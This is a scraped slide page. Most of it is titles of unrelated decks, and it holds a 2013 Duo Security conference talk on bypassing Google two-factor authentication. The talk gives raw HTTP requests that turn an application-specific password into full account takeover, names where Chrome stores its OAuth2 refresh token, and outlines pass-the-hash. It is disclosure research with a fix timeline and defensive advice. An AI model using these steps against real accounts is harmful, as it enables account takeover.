Social Media Marketing Trends 2024 // The Global Indie InsightsKurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summarySpeakerHub
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next Tessa Mero
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentLily Ray
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesVit Horky
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project managementMindGenius
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...RachelPearson36
 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

Security exploits of Google application specific passwords & Chrome’s OAuth2 tokens

  • 1. Bypassing Strong Authentication... With Passwords?! Adam Goodman akgood@duosecurity.com Passwords13 - 2013-07-31 duosecurity.com 1
  • 2. 0. Kill The Password? duosecurity.com 2
  • 6. 1. Bypassing Google’s 2-Factor Authentication duosecurity.com 6
  • 11. What About Non-Web-Based Logins? Thick-Client Protocols ‣ IMAP ‣ CalDAV ‣ XMPP ‣ ... Google Software (Interim Solution) ‣ Android ‣ Chrome duosecurity.com 11
  • 13. Application-Specific Passwords ‣ 16 lowercase letters ‣ Randomly-Generated by Google ‣ Individually Revokable ‣ Not intended to be memorized sounds a bit like... duosecurity.com 13
  • 14. ASPs vs. OAuth Tokens ‣ ASPs have to be generated manually ‣ ASPs aren’t actually Application-Specific! duosecurity.com 14
  • 15. Not-So-Application-Specific “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 duosecurity.com 15
  • 16. Detour: Android Auto-Login Also: ‣ Chromebooks ‣ Desktop versions of Chrome (if enabled in chrome://flags) ‣ ...? duosecurity.com 16
  • 17. Detour: Android Auto-Login Worked even for the most sensitive parts of https://accounts.google.com: ‣ 2FA settings: https://accounts.google.com/b/0/SmsAuthConfig?hl=en ‣ Account-Recovery Settings: https://accounts.google.com/b/0/ UpdateAccountRecoveryOptions?hl=en&service=oz duosecurity.com 17
  • 18. So... ‣ ASPs can link an Android device, and ‣ With auto-login, Android devices could - with no additional authentication - take over your account completely! duosecurity.com 18
  • 19. Let’s Figure Out How This Works... Android HTTPS Interception, v1 ‣ Real Device (Google Nexus S) with a custom default gateway ‣ Linux Desktop, running sslsniff ‣ http://www.thoughtcrime.org/software/sslsniff/ ‣ Custom CA certificate duosecurity.com 19
  • 20. Let’s Figure Out How This Works... Android HTTPS Interception, v2 ‣ Android Emulator ‣ $ emulator -http-proxy localhost:8080 @avd_name ‣ Burp Suite Proxy ‣ http://portswigger.net/burp/ ‣ Custom CA certificate duosecurity.com 20
  • 22. Basic Workflow ‣ POST to https://android.clients.google.com/auth ‣ Send Email, EncryptedPasswd, service=ac2dm ‣ Receive “Token” ‣ POST to https://android.clients.google.com/auth ‣ Send Email, Token, service=urlquote(“weblogin:continue=https://accounts.google.com/ ManageAccount”) ‣ Receive “MergeSession” URL ‣ Open the MergeSession URL; get instantly logged into your account! duosecurity.com 22
  • 23. Step 1 POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %40arbsec.org&has_permission=1&add_account=1&EncryptedPa sswd=AFcb4...&service=ac2dm&source=android&androidId=328 1f33679ccc6c6&device_country=us&operatorCountry=us&lang=e n&sdk_version=17 duosecurity.com 23
  • 24. Step 1 HTTP/1.1 200 OK ... SID=DQAAANwAAAVMG4uYt2HaF... Auth=DQAAAOAAAACRbLC5-dgM... services=goanna_mobile,apps,... Email=akgood@arbsec.org Token=1/fXrv8D3fLP1mOBj3o1... GooglePlusUpgrade=1 firstName=Adam lastName=Goodman duosecurity.com 24
  • 25. Step 1: EncryptedPasswd? POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %40arbsec.org&has_permission=1&add_account=1&Passwd=xxx xxxxxxxxxxxxx&service=ac2dm&source=android&androidId=328 1f33679ccc6c6&device_country=us&operatorCountry=us&lang=e n&sdk_version=17 duosecurity.com 25
  • 26. Step 2 POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=akgood %arbsec.org&has_permission=1&Token=1%2FfXrv8D3fLP1mOBj3o1... ...&service=weblogin%3Acontinue%3Dhttps%253A%252F %252Faccounts.google.com %252FManageAccount&source=android&androidId=3281f33679ccc6c 6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b86 4bd85b0bfaa5af81&device_country=us&operatorCountry=us&lang=en& sdk_version=17 duosecurity.com 26
  • 27. Step 2 HTTP/1.1 200 OK ... Auth=https://accounts.google.com/MergeSession?args=continue %3Dhttps%253A%252F%252Faccounts.google.com %252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 duosecurity.com 27
  • 28. Simplified Workflow ‣ POST to https://android.clients.google.com/auth ‣ Send Email, Passwd, service=urlquote(“weblogin:continue=https://accounts.google.com/ ManageAccount”) ‣ Receive “MergeSession” URL Go from Application-Specific Password to full account takeover with one API call! duosecurity.com 28
  • 29. Timeline ‣ 2012/07/16: Duo researchers confirm presence of ASP weakness. ‣ 2012/07/18: Issue reported to security@google.com. ‣ 2012/07/20: Communication with Google Security Team clarifying the issue. ‣ 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team. ‣ 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces. ‣ 2013/02/25: Public disclosure by Duo. duosecurity.com 29
  • 30. Google’s Fix ‣ Sensitive account-settings pages are no longer accessible via auto-login (you must enter username/password/OTP) ‣ ~Nothing else has changed duosecurity.com 30
  • 31. Multiple Discovery ‣ http://grkvlt.blogspot.co.uk/2012/08/google-tfa-security- issue.html ‣ http://connect.ncircle.com/ncircle/attachments/ncircle/ VERTBlog/173/1/CraigYoung_BSidesSlides-2SV.pdf duosecurity.com 31
  • 33. 2-step Verification Still Helps... ‣ Phishing ‣ Password-sharing between services (with insecure password databases) duosecurity.com 33
  • 34. ... But ASPs Can Be Stolen HTTPS Man-In-The-Middle ‣ Thick-client applications are notoriously bad at checking SSL certificates: https://crypto.stanford.edu/ ~dabo/pubs/abstracts/ssl- client-bugs.html Malware can grab stored passwords... ‣ Windows: Data Protection API ‣ Encrypts data using a key derived from the user’s logon credential ‣ Any process running under the same user account can decrypt any DPAPI-protected data ‣ OS X: Keychain ‣ Stronger: per-application permissions Plaintext... duosecurity.com 34
  • 35. Case Study: Pidgin ‣ Plain-Text Passwords! ‣ https://developer.pidgin.im/wiki/PlainTextPasswords ‣ GTalk / “Hangouts” - (probably) low impact if compromised ‣ If we were storing a credential that only had access to your GTalk account, then storing it in plaintext might be ~OK ‣ GMail - (probably) high impact if compromised ‣ ... all of your other accounts on the internet?! duosecurity.com 35
  • 36. Not Just Application-Specific Passwords ‣ Chrome on Windows / Mac / Linux has the same “auto- login” functionality ‣ ... but it’s using OAuth2 now! duosecurity.com 36
  • 37. Workflow ‣ POST to https://accounts.google.com/o/oauth2/token ‣ send refresh_token, client_id, client_secret (the latter two are hardcoded into Chrome) ‣ receive access_token ‣ GET to https://accounts.google.com/OAuthLogin? source=ChromiumBrowser&issueuberauth=1 ‣ send access_token in Authorization header ‣ get “uberauth” token back ‣ Use “uberauth” token to construct a MergeSession URL duosecurity.com 37
  • 38. How Is The Refresh Token Stored? from (e.g.) ~/Library/Application Support/Google/Chrome/ Default/Preferences: ... "oauth2LoginRefreshToken": { "status": "Successful", "value": "1/0209_TGZzDyfxwozFV..." } ... duosecurity.com 38
  • 39. OAuth2 Won’t (automagically) Save You Unexpected threat models: ‣ Access to your tabs/bookmarks/history/etc. vs access to your entire Google account! duosecurity.com 39
  • 40. 2. Passing The Hash In Windows Networks... Even When Passwords Are “Disabled” (borrowing in part from http://www.foofus.net/~hinge/presos/insidious-implicit-windows-trust-relationships.pdf) duosecurity.com 40
  • 41. Local vs Domain Logins ‣ Local ‣ Password hashes are stored on your workstation ‣ Domain ‣ Password hashes stored on the Domain Controller ‣ Your workstation will cache them, sometimes ‣ Both Local and Domain accounts can be administrators on your workstation Workstation Workstation Workstation Other ServerDomain Controller duosecurity.com 41
  • 42. Authentication In Windows Networks ‣ NTLM Authentication ‣ Kerberos ‣ ... duosecurity.com 42
  • 43. NTLM Authentication ‣ Challenge-Handshake Protocol ‣ Uses NTLM Hash of user’s password, not the password itself! ‣ One-way hash function ‣ No salting, no PBKDF2 ... ‣ Extremely pervasive in Windows ecosystems ‣ RPCs ‣ SMB mounts ‣ ... duosecurity.com 43
  • 44. Pass-The-Hash NTLM Authentication only requires the NTLM Hash! ‣ Gain local admin rights on a single workstation (somehow...) ‣ Extract NTLM Hashes ‣ Use them to compromise other machines in the network! Workstation Workstation Domain Controller Workstation Other Server duosecurity.com 44
  • 45. What About Smart-Cards? Public/Private Key-pair and Certificate stored on cryptographic hardware ‣ Private Key can “never” be extracted ‣ Authenticate by asking the smartcard to digitally-sign a value (basically, Challenge-Handshake) ‣ Windows can do Certificate-based user authentication Sounds much better, right? duosecurity.com 45
  • 46. What About Smart-Cards? “In order to support NTLM authentication [MS-NLMP] for applications connecting to network services that do not support Kerberos authentication, when PKCA is used, the KDC returns the user's NTLM one-way function (OWF) in the privilege attribute certificate (PAC) PAC_CREDENTIAL_INFO buffer ([MS-PAC] section 2.6.1).” - [MS-PKCA]: Public Key Cryptography for Initial Authentication (PKINIT) in Kerberos Protocol http://msdn.microsoft.com/en-us/library/cc238455.aspx duosecurity.com 46
  • 47. Evaluation Smart-cards still can help... ‣ Weak Passwords ‣ Shared Passwords between accounts / systems But Pass-The-Hash attacks can still be a threat! duosecurity.com 47
  • 49. Real-world ecosystems tend to have multiple, distinct authentication scenarios... ... passwords (or similar stored-secret authentication methods) are likely to continue to exist in some scenarios ... ...in each scenario, we must carefully balance privileges with trust duosecurity.com 49
  • 50. Authentication Scenarios and Trust Rights ‣ What is the maximum set of permissions that should be granted to a user? Integrity Level ‣ How strongly has a user / client authenticated? duosecurity.com 50
  • 51. 4. Amazon Web Services: Identity and Access Management (IAM) duosecurity.com 51
  • 52. Identity And Access Management (IAM) ‣ A single AWS account can have multiple users ‣ Flexible Rights-Expression Language, based on: ‣ Resources (e.g. EC2 Instances, DNS zones, ...) ‣ Actions (e.g. start instance, stop instance, ...) ‣ Other session context (e.g. client IP address, SSL usage, whether 2FA was used, ...) duosecurity.com 52
  • 53. IAM Policy Example { "Version":"2012-10-17", Statement: [{ "Action":["ec2:StopInstances","ec2:TerminateInstances"], "Effect":"Deny", "Resource":["*"], "Condition":{ "Null":{"aws:MultiFactorAuthAge":"true"} } }] } Deny specific actions if a user didn’t use 2-factor authentication duosecurity.com 53
  • 54. 2-Factor Authentication for API Clients Amazon Secure Token Service ‣ Provide API credentials and a one-time-passcode to a specific endpoint ‣ Get a new set of temporary credentials back duosecurity.com 54
  • 55. Evaluation AWS gives you all the tools to build strong, flexible authorization policies... ... but you have to actually build them! AWS is intended for developers (and other savvy types) duosecurity.com 55